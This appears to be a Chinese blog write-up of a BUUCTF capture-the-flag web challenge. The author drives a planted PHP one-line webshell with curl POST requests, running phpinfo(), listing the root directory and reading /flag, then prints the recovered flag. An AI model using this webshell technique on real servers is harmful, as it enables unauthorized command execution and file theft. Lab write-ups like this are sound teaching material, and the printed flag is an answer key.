这题几乎是送分
题目不断暗示,后台存在一句话木马
拿个蚁剑连上去就完事了
这里用curl 连上去,演示一下,理解一下其中的原理
#注意 phpinfo() 后面的分号不能省
curl -d "Syc=phpinfo();" http://32a31ff6-2815-4485-a74e-e646f675808d.node4.buuoj.cn:81/
在构造一个来试试,查看文件
curl -d "Syc=system('ls /');" http://32a31ff6-2815-4485-a74e-e646f675808d.node4.buuoj.cn:81/
返回
<html>
bin
boot
data
dev
etc
flag #注意这里
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
......
再次构造
curl -d "Syc=system('cat /flag');" http://32a31ff6-2815-4485-a74e-e646f675808d.node4.buuoj.cn:81/
boom
得到flag : flag{52a4a837-7d3d-46b9-9d5f-7aa403fe7ad1}
标签:Syc,WEB,BUUCTF,cn,buuoj,flag,极客,curl,81 From: https://www.cnblogs.com/gradyblog/p/16974011.html